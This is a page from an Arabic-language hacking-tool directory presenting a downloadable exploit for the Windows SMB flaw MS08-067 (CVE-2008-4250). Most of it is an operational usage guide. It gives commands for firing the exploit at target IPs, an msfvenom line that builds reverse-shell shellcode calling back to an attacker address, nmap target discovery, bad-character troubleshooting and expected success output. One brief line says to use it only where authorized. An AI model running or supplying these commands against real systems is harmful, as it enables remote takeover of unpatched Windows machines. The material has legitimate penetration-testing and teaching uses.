Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploit_MS08-067 — MS08-067 | CVE-2008-4250 | Kitploit
أدوات/GitHubGitHub/notrustedx/exploit_ms08-067
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداختبار الاختراقأداة الوصول عن بعد
GitHubnotrustedx/exploit_ms08-067

Exploit_MS08-067

MS08-067 | CVE-2008-4250

عرض المستودع
12منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

دليل الاستخدام الكامل: # Exploit MS08-067 المحسّن

📌 الاستخدام الأساسي

root@kitploit:~
python3 Exploit_MS08-067.py <IP_VÍCTIMA> <VERSIÓN_OS> [OPCIONES]

🎯 أمثلة عملية

1. Windows XP SP0/SP1 (المنفذ الافتراضي 445)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.100 1

2. Windows 2003 SP1 English (المنفذ 139)

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.150 4 -p 139

3. باستخدام شيل كود مخصص

root@kitploit:~
python3 Exploit_MS08-067.py 192.168.1.200 6 -s /ruta/mishellcode.bin

🔍 المعاملات الإلزامية

المعاملالوصفالقيم الصالحة
IP_VÍCTIMAIP الهدفأي عنوان IPv4
VERSIÓN_OSإصدار نظام التشغيل المعرّض للثغرة1-7 (انظر الجدول)

📋 جدول الإصدارات المدعومة

القيمةنظام التشغيلالبنية
1Windows XP SP0/SP1 Universalx86
2Windows 2000 Universalx86
.........

⚙️ الخيارات الإضافية

الخيارالوصفالافتراضي
-p/--portمنفذ SMB (445/139)445

🛠️ توليد شيل كود باستخدام msfvenom

root@kitploit:~
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.201 LPORT=4484 \
EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode \
-a x86 --platform windows

🔎 تحديد الهدف

root@kitploit:~
nmap -p 139,445 --script smb-os-discovery <IP_VÍCTIMA>

🚨 حل المشكلات الشائعة

الخطأ: STATUS_OBJECT_NAME_NOT_FOUND

  1. تحقق مما إذا كانت خدمة Browser نشطة:

    root@kitploit:~
    nmap -p 445 --script smb-enum-shares <IP>
    
  2. جرّب باستخدام pipe آخر (عدّل السكربت):

    root@kitploit:~
    # Cambiar \\pipe\\browser por \\pipe\\srvsvc
    

شيل كود لا ينفذ

  • تحقق من الأحرف المحظورة: \x00\x0a\x0d\x5c\x5f\x2f\x2e\x40
  • استخدم هذا الأمر للتحقق:
    root@kitploit:~
     msfvenom -p windows/exec CMD="calc.exe" -f raw | xxd | grep -E "00|0a|0d|5c|5f|2f|2e|40"
    

💡 توصيات أخلاقية

✅ الاستخدام فقط في بيئات مصرح بها
❌ أبدًا على أنظمة الإنتاج دون إذن

📊 المخرجات الناجحة المتوقعة

root@kitploit:~
[*] Targeting 192.168.1.100 | OS: 1 | Port: 445
[+] Connected to 192.168.1.100 on port 445
[*] Sending exploit...
[+] Exploit finished - Check your listener!

⚠️ ملاحظة: لا يعمل هذا الاستغلال على الأنظمة المحدّثة بالتصحيح MS08-067.

تنزيل الأداة
-t/--timeout
المهلة بالثواني
5
-s/--shellcodeالمسار إلى شيل كود مخصصNone